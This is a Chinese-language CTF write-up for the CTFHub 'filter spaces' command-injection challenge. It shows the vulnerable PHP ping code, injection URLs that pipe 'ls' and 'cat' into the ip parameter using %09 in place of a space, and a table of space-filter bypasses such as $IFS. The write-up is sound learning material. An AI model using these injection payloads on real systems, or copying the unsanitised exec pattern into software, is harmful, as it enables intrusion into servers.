CTFHub | 过滤空格
检查网页源代码发现这题如果有空格就不会执行,说明这题对空格做了过滤处理。同样在输入框中输入 IP 进行测试,可以正常回显。
文章共804字 · 阅读需要大约3分钟
一键AI生成摘要,助你高效阅读
问答
·
0x00 前言
CTFHub 专注网络安全、信息安全、白帽子技术的在线学习,实训平台。提供优质的赛事及学习服务,拥有完善的题目环境及配套 writeup ,降低 CTF 学习入门门槛,快速帮助选手成长,跟随主流比赛潮流。
0x01 题目描述
过滤空格:
这次过滤了空格,你能绕过吗。
0x02 解题过程
Ⅰ检查网页源代码发现这题如果有空格就不会执行,说明这题对空格做了过滤处理。同样在输入框中输入 IP 进行测试,可以正常回显。
<?php
$res = FALSE;
if (isset($_GET['ip']) && $_GET['ip']) {
$ip = $_GET['ip'];
$m = [];
if (!preg_match_all("/ /", $ip, $m)) {
$cmd = "ping -c 4 {$ip}";
exec($cmd, $res);
} else {
$res = $m;
}
}
?>
Ⅱ在 URL 后加入管道符号,输入 ls 命令进行查看,同样发现一个 flag 可疑文件。
http://challenge-150707dae6f3ddfe.sandbox.ctfhub.com:10800/?ip=127.0.0.1|ls
Ⅲ在管道符后输入 cat flag 命令进行查看。因为这题过滤了空格,如果在 URL 中输入空格,则不会执行 ping 命令。那么这里将空格替换为 %09 ,也就是 ASCII 的 Tab 键。检查网页,同样是有传递无内容,检查网页源代码发现此题 flag 。
http://challenge-150707dae6f3ddfe.sandbox.ctfhub.com:10800/?ip=127.0.0.1|cat%09flag_5338166523061.php
0x03 常见绕过方法
过滤空格指的是从一段文本中去除空格,即删除字符串中的空格字符。在 URL 中,我们输入的符号都会由 URL 编码进行转换输出,例如 %20 在 URL 中就代表空格的意思。
名称 | 介绍 |
< | 表示输入重定向,可以将文件或命令的输出作为输入传递给另一个命令。 |
<> | 表示输入输出的重定向。可以将文件或命令的输出作为输入传递给另一个命令,并将输出重定向到另一个文件。 |
%09 | 在 URL 中表示制表符。 |
%20 | 在 URL 中表示空格。 |
$IFS | 直接使用 $IFS 变量表示空格。 |
\${IFS} | 与 $IFS 变量一致,添加了反斜杠以及大括号。 |
0x04 总结
文章内容为学习记录的笔记,由于作者水平有限,文中若有错误与不足欢迎留言,便于及时更正。
更多推荐
已为社区贡献5条内容
所有评论(0)